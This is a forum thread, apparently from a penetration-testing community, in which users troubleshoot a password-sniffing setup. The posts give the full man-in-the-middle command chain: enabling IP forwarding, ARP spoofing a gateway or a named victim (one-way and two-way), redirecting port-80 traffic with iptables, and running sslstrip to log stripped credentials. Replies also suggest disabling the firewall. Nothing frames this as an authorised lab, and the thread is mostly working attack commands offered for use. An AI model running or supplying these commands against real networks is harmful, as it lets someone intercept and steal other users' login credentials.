Problem with Password Sniffing with SSLStrip

[Eatme]

While on VMware everything was working perfectly, these are the commands I always entered in the following order:

Code:

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward (returned with NUM 1)

arpspoof -i wlan0 192.168.1.1 (gateway is just being used so that I can sniff the whole network)

iptables --flush

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

sslstrip -a -f -k -l 8080
(creates sslstrip.log)

Now that I'm running a HD install (no more vmware) these steps are not working anymore...
Even the sslstrip.log is not saving anything...

BT4-Final
uname -r: 2.6.34
HD Install

[sickness]

I would suggest you try sniffing only 1 target and post back the results.

Code:

arpspoof -i wlan0 -t VictimIP DefaultGW

Oh and by the way turn off your firewall (if you have one)

[Eatme]

I would suggest you try sniffing only 1 target and post back the results.

Code:

arpspoof -i wlan0 -t VictimIP DefaultGW

Oh and by the way turn off your firewall (if you have one)

why can't I sniff the whole network though ? and before this worked with no problems..

[sickness]

Well that's what we are trying to find out, so try with only 1 target and give us a feedback

[FLYINGHAGGIS]

Not a hundred percent sure as I am trying to get my head round several issues that
I have with this programme...

However, the command...

sslstrip -a -f -k -l 8080

does the -k switch no kill the process before it has run

-k , --killsessions Kill sessions in progress.
the above was taken from the splash screen when sslstrip is first run.

I may be wrong but who knows........

Rab.

[Eatme]

I would suggest you try sniffing only 1 target and post back the results.

Code:

arpspoof -i wlan0 -t VictimIP DefaultGW

Oh and by the way turn off your firewall (if you have one)

ok, thanks this has worked (i had a thought it would, just didn't go with it). I think I got stuck at trying to arpspoof my self as well as the whole network and checking to see if it works while I'm on the same computer instead of going on the other computer and seeing the results... well this time I did.

But why all of the sudden, I can't arpspoof (-i wlan0 -t 192.168.1.ME 192.168.1.1) my self on HD install ? On vmware this wasn't a problem.

Never the less, sniffing the whole network still works, I just never tried to see the results on another computer..thanks guys!

[sickness]

No problem glad we could help

[gunrunr]

if you use said commands and run wireshark are you seeing any packets being redirected to you? anything on port 80 like get requests?

usually i tend to poison both ways instead of just one way like you are doing, just poisoning the gateway in one direction doesn't work well for me. usuallyu i poison the gateway and the clients on it, so i can get both sides of the conversation like this

Code:

arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

take a look at irongeeks page Basics of Arpspoofing/Arppoisoning